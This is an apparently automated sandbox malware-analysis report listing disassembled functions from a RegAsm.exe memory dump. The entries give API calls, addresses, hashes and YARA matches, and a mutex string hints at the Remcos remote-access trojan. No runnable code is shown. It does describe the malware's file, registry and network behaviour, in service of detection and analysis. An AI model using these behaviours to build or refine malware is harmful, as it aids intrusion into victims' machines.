                                                • Instruction ID: 239c22332ac31c5199b3ba4764290be2907fca328f5d1df1ca03bb1201a614b6
                                                • Opcode Fuzzy Hash: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                • Instruction Fuzzy Hash: D401FC32602322EBDB618A78EC4495F7758AF15BA2B22093AF909D3241DF24DC01C6EC
                                                APIs
                                                • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0041C543
                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C568
                                                • CloseHandle.KERNEL32(00000000), ref: 0041C576
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$CloseCreateHandleReadSize
                                                • String ID:
                                                • API String ID: 3919263394-0
                                                • Opcode ID: eaf6ed3f63b4403b43378431095bcec12dbe7b76bb0b9555606dcebd0a0bb3a0
                                                • Instruction ID: 4673af35f3eeaf13de89ae80f5e83caf65f56e40ae5cb47f4621101913e6d1ef
                                                • Opcode Fuzzy Hash: eaf6ed3f63b4403b43378431095bcec12dbe7b76bb0b9555606dcebd0a0bb3a0
                                                • Instruction Fuzzy Hash: 50F0C2B1241318BFE6101B25ADC9EBB369DDB866A9F10063EF802A22D1DA698D055139
                                                APIs
                                                • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC43,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0040D0B3
                                                • GetLastError.KERNEL32 ref: 0040D0BE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateErrorLastMutex
                                                • String ID: Rmc-GT4655
                                                • API String ID: 1925916568-2007630954
                                                • Opcode ID: 28fa13b7b1caae5192b70daf2f30c6e0a610ddba166525727d25863cd50ab091
                                                • Instruction ID: 57749e379dff282fb0cfe370275dd79dddcb706c5168e3a31171962593876721
                                                • Opcode Fuzzy Hash: 28fa13b7b1caae5192b70daf2f30c6e0a610ddba166525727d25863cd50ab091
                                                • Instruction Fuzzy Hash: 0DD012B0605700EBDB186770ED5975839559744702F40487AB50FD99F1CBBC88908519
                                                APIs
                                                • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                  • Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                  • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                  • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: HandleModuleProtectVirtual
                                                • String ID:
                                                • API String ID: 2905821283-0
                                                • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                • Instruction ID: abaa11d5974e3e1b05dfd32ec0224f7ddc3d76465740e120717e363e7a178845
                                                • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                • Instruction Fuzzy Hash: A921382140838A6FF711CBB44C05FA67FD8DB172E0F198696E040CB147DDA89845C3AE
                                                APIs
                                                • send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                • WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                • SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: EventObjectSingleWaitsend
                                                • String ID:
                                                • API String ID: 3963590051-0
                                                • Opcode ID: b1d66744df5c6cb587348be29f4f2b73cfa97db57556f8ad38e66ecf600c3840
                                                • Instruction ID: ade4869c8039bafc3f5202e75afdfb18787be874a76dce876c460fae4797ad88
                                                • Opcode Fuzzy Hash: b1d66744df5c6cb587348be29f4f2b73cfa97db57556f8ad38e66ecf600c3840
                                                • Instruction Fuzzy Hash: 152124B2900119BBCB04ABA1DC95DEEB77CFF14314B00452FF515B71E2EB38AA15C6A4
                                                APIs
                                                • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual$HandleModule
                                                • String ID:
                                                • API String ID: 3519776433-0
                                                • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                • Instruction ID: 9138b94afbcae90e12a8614b592989542e7cb6e8cba5f1d72008c399686a5f74
                                                • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                • Instruction Fuzzy Hash: B7F0C2619497893CFA21C7B40C45EBA5FCCCB276E0B249A56F600C718BDCA5890693FE
                                                APIs
                                                • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                • RegQueryValueExA.KERNEL32 ref: 00413622
                                                • RegCloseKey.KERNEL32(?), ref: 0041362D
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseOpenQueryValue
                                                • String ID:
                                                • API String ID: 3677997916-0
                                                • Opcode ID: 6d7bb055a41a46af3afbf88891c67b332a8db22587d044117d184b09d82707ea
                                                • Instruction ID: 0661f39b514c0023b6096d8878825bbc81d19e8e8981dfb5b132c5fecbfe39b6
                                                • Opcode Fuzzy Hash: 6d7bb055a41a46af3afbf88891c67b332a8db22587d044117d184b09d82707ea
                                                • Instruction Fuzzy Hash: 4A01D676900228FBCB209B91DC08DEF7F7DDB44B51F004066BB05A2240DA748E45DBA4
                                                APIs
                                                • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 0041374F
                                                • RegQueryValueExA.KERNEL32 ref: 00413768
                                                • RegCloseKey.KERNEL32(00000000), ref: 00413773
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseOpenQueryValue
                                                • String ID:
                                                • API String ID: 3677997916-0
                                                • Opcode ID: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                                • Instruction ID: cdc8bb2f12cdea1da97e3e4d454c68039a4c25ad8704162e95ac064a0ac82555
                                                • Opcode Fuzzy Hash: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                                • Instruction Fuzzy Hash: C301AD7540022DFBDF215F91DC04DEB3F38EF05761F008065BE09620A1E7358AA5EB94
                                                APIs
                                                • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                                • RegQueryValueExA.KERNEL32 ref: 004135C2
                                                • RegCloseKey.KERNEL32(?), ref: 004135CD
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseOpenQueryValue
                                                • String ID:
                                                • API String ID: 3677997916-0
                                                • Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                • Instruction ID: 3ea041f737baa467864e73cd7e114674dd940ed34319bd14b5ec79364d8ab256
                                                • Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                • Instruction Fuzzy Hash: 39F01D76900218FFDF109FA09C45FEE7BBDEB04B11F1044A5BA04E6191D6359F549B94
                                                APIs
                                                • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413551
                                                • RegQueryValueExA.KERNEL32 ref: 00413565
                                                • RegCloseKey.KERNEL32(?), ref: 00413570
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseOpenQueryValue
                                                • String ID:
                                                • API String ID: 3677997916-0
                                                • Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                • Instruction ID: 960a54a16a1ccd4152458ec6927d20d37e2092670a33f2d7c306b576a706ad25
                                                • Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                • Instruction Fuzzy Hash: 23E06532801238FBDF204FA29C0DDEB7F6CDF06BA1B000155BD0CA1111D2258E50E6E4
                                                APIs
                                                • RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                • RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                                                • RegCloseKey.KERNEL32(004660B4), ref: 004138E6
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseCreateValue
                                                • String ID:
                                                • API String ID: 1818849710-0
                                                • Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                • Instruction ID: 04d77b696783773a8a307df6842786532c8303179302b097fa31242bc3118ae5
                                                • Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                • Instruction Fuzzy Hash: 1EE06D72500318FBDF109FA0DC06FEA7BACEF04B62F104565BF09A6191D6358E14E7A8
                                                APIs
                                                • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 10006AF0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: Info
                                                • String ID:
                                                • API String ID: 1807457897-3916222277
                                                • Opcode ID: 6cedc9456a51a48c8b79c853d380540c5183232597a17884e183f7c8afc1900e
                                                • Instruction ID: 7792c4a5177154c3e9ca344f7bd1be717728489360a1cc3eced530dab922c6d1
                                                • Opcode Fuzzy Hash: 6cedc9456a51a48c8b79c853d380540c5183232597a17884e183f7c8afc1900e
                                                • Instruction Fuzzy Hash: D241FCB050429C9AFB21CF148C84BEABBEAEB49344F2444EDE5C9C6146D735AA85DF20
                                                APIs
                                                • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0044EE69
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Info
                                                • String ID:
                                                • API String ID: 1807457897-3916222277
                                                • Opcode ID: c218bb7fec2994ea758599c37fad7e7d2b1b4cc9144a8923480740bb4dc68c2e
                                                • Instruction ID: 2d4132b881e94a0a9fd0de77a922cbe9b4a8b8c61ff6a95216f325efaac8b060
                                                • Opcode Fuzzy Hash: c218bb7fec2994ea758599c37fad7e7d2b1b4cc9144a8923480740bb4dc68c2e
                                                • Instruction Fuzzy Hash: 7E411070504748AFEF218E25CC84AF7BBB9FF45304F2404EEE59987142D2399A46DF65
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _wcslen
                                                • String ID: pQG
                                                • API String ID: 176396367-3769108836
                                                • Opcode ID: 5581d9da4b44419582c52f90d2dac08d2b870ca85f72c258eca40ba8ececd965
                                                • Instruction ID: e26466b944e621eef81fbe5db30e3e3b172770e45cde188e8c087a2518f8d89f
                                                • Opcode Fuzzy Hash: 5581d9da4b44419582c52f90d2dac08d2b870ca85f72c258eca40ba8ececd965
                                                • Instruction Fuzzy Hash: 631181319002059BCB15EF66E852AEF7BB4AF54314B10413FF446A62E2EF78AD15CB98
                                                APIs
                                                • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,5EFC4D8B,00000100,?,5EFC4D8B,00000000), ref: 10005F8A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: String
                                                • String ID: LCMapStringEx
                                                • API String ID: 2568140703-3893581201
                                                • Opcode ID: 9311d150e09a2ea236c127db5a9a9399c35e1f3cdcd5bb094b510bbe54d2b48d
                                                • Instruction ID: 984c2aabb43d86beb2eff1d34daabde68608d0bd8f0a2971fe4c3ea005c0c61c
                                                • Opcode Fuzzy Hash: 9311d150e09a2ea236c127db5a9a9399c35e1f3cdcd5bb094b510bbe54d2b48d
                                                • Instruction Fuzzy Hash: 9401D332500159BBEF129F90CC05EEE7F66EF08390F018115FE1826124CB369971AB95
                                                APIs
                                                • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001,?,?), ref: 00448CA4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: String
                                                • String ID: LCMapStringEx
                                                • API String ID: 2568140703-3893581201
                                                • Opcode ID: 4e10c201ebb2099c74eb4779768ff64867bf24b434018514e16e99dc8bd4ef65
                                                • Instruction ID: c3f282dcf0fd97a5c368a601407465e3bede0a00add2935535d0592c00eac712
                                                • Opcode Fuzzy Hash: 4e10c201ebb2099c74eb4779768ff64867bf24b434018514e16e99dc8bd4ef65
                                                • Instruction Fuzzy Hash: 3001253254120CFBCF02AF91DD02EEE7F66EF08751F04416AFE1965161CA3A8971EB99
                                                APIs
                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0044BFCF,-00000020,00000FA0,00000000,00467388,00467388), ref: 00448B4F
                                                Strings
                                                • InitializeCriticalSectionEx, xrefs: 00448B1F
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CountCriticalInitializeSectionSpin
                                                • String ID: InitializeCriticalSectionEx
                                                • API String ID: 2593887523-3084827643
                                                • Opcode ID: 6340ef5d4d263af2985355ee658efc66a6ef890db148a952ff0e7e01781af4fe
                                                • Instruction ID: 6b0d226957fc5e3530c80ec385177705bb254131620a7d42d33c8bf65efe755d
                                                • Opcode Fuzzy Hash: 6340ef5d4d263af2985355ee658efc66a6ef890db148a952ff0e7e01781af4fe
                                                • Instruction Fuzzy Hash: F0F0E93164021CFBCB025F55DC06E9E7F61EF08B22B00406AFD0956261DF3A9E61D6DD
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: Alloc
                                                • String ID: FlsAlloc
                                                • API String ID: 2773662609-671089009
                                                • Opcode ID: 5ade6ed448300679f83b5d20ac83fd3ad7347746afaf7e54a560ff76d56e46a0
                                                • Instruction ID: c304bc83fd0672a576945d725d7c66755e55876121cef6cfa1c70df20931aaa1
                                                • Opcode Fuzzy Hash: 5ade6ed448300679f83b5d20ac83fd3ad7347746afaf7e54a560ff76d56e46a0
                                                • Instruction Fuzzy Hash: 43E0E535600228ABF325EB608C15EEFBBA4DB583D1B01405AFE0966209CE326D0185D6
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Alloc
                                                • String ID: FlsAlloc
                                                • API String ID: 2773662609-671089009
                                                • Opcode ID: 8d34d378e792ffc8bee28f5c2a12e2aa67d49de27489c3fe41b8e68b567a8336
                                                • Instruction ID: f8901b274c9ac7999680b04b2037e580393277d5e39e0d99f0e7f02c98ef4e36
                                                • Opcode Fuzzy Hash: 8d34d378e792ffc8bee28f5c2a12e2aa67d49de27489c3fe41b8e68b567a8336
                                                • Instruction Fuzzy Hash: 8FE05530640318F7D3016B21DC16A2FBB94DB04B22B10006FFD0553241EE794D15C5CE
                                                APIs
                                                • try_get_function.LIBVCRUNTIME ref: 10003B06
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: try_get_function
                                                • String ID: FlsAlloc
                                                • API String ID: 2742660187-671089009
                                                • Opcode ID: e5392f9aa55551a50589cb99c6148b67437594651e03cd2756b54b563a9e1daf
                                                • Instruction ID: 0b7c7f44018c04906f4f2ef9afae3f4f684564eee465a9a4c05fe82f6616737e
                                                • Opcode Fuzzy Hash: e5392f9aa55551a50589cb99c6148b67437594651e03cd2756b54b563a9e1daf
                                                • Instruction Fuzzy Hash: 13D02B32744138B3F201B3A06C04BEEBB88D7025F2F040063FB4C5210CDB11591042E6
                                                APIs
                                                • try_get_function.LIBVCRUNTIME ref: 00438E29
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: try_get_function
                                                • String ID: FlsAlloc
                                                • API String ID: 2742660187-671089009
                                                • Opcode ID: 1eb4f256e7c4e0b4dee7f2b7c001ffdd8c026b266bbfd6c5aa47d90a079f9e5b
                                                • Instruction ID: b64d3ab94c56a33c1928a034b10f94234fe941941be7f39555266fb58f36a209
                                                • Opcode Fuzzy Hash: 1eb4f256e7c4e0b4dee7f2b7c001ffdd8c026b266bbfd6c5aa47d90a079f9e5b
                                                • Instruction Fuzzy Hash: 09D02B31BC1328B6C51032955C03BD9B6048B00FF7F002067FF0C61283899E592082DE
                                                APIs
                                                • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B85B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: GlobalMemoryStatus
                                                • String ID: @
                                                • API String ID: 1890195054-2766056989
                                                • Opcode ID: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                                • Instruction ID: 2d2b64c70bc766df394076410504e3f9c8f669937c614d63c6700d8895b1c70c
                                                • Opcode Fuzzy Hash: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                                • Instruction Fuzzy Hash: E6D017B58023189FC720DFA8E804A8DBBFCFB08210F00456AEC49E3700E770E8008B94
                                                APIs
                                                  • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
                                                • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,10006CC1,?,00000000), ref: 10006E94
                                                • GetCPInfo.KERNEL32(00000000,10006CC1,?,?,?,10006CC1,?,00000000), ref: 10006EA7
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: CodeInfoPageValid
                                                • String ID:
                                                • API String ID: 546120528-0
                                                • Opcode ID: 4adf61bb8ef5ba689b58ef35b1aaecca0a92cbb4d0ae1edbfb61d6a665a170f3
                                                • Instruction ID: 1dd91d3823b6bb4934ca9945ee4913e93bf289da146d72ec34fd0236562290e4
                                                • Opcode Fuzzy Hash: 4adf61bb8ef5ba689b58ef35b1aaecca0a92cbb4d0ae1edbfb61d6a665a170f3
                                                • Instruction Fuzzy Hash: 91513474E043469EFB21CF71DC916BBBBE6EF49280F20807EE48687156D735DA458B90
                                                APIs
                                                  • Part of subcall function 0044ED6C: GetOEMCP.KERNEL32(00000000,?,?,0044EFF5,?), ref: 0044ED97
                                                • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044F03A,?,00000000), ref: 0044F20D
                                                • GetCPInfo.KERNEL32(00000000,0044F03A,?,?,?,0044F03A,?,00000000), ref: 0044F220
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CodeInfoPageValid
                                                • String ID:
                                                • API String ID: 546120528-0
                                                • Opcode ID: 747d95ecf2005c527016839393fb107aa8d78a19bbf0a74999b8906be39dfc0a
                                                • Instruction ID: 491245c4813b68437391e3e70942b885a5b84425ef1b1be509cf98dd56c33fdc
                                                • Opcode Fuzzy Hash: 747d95ecf2005c527016839393fb107aa8d78a19bbf0a74999b8906be39dfc0a
                                                • Instruction Fuzzy Hash: A05153749002469EFB208F76C8816BBBBE4FF01304F1480BFD48687251E67E994A8B99
                                                APIs
                                                  • Part of subcall function 10005AF6: GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                  • Part of subcall function 10005AF6: _free.LIBCMT ref: 10005B2D
                                                  • Part of subcall function 10005AF6: SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                  • Part of subcall function 10005AF6: _abort.LIBCMT ref: 10005B74
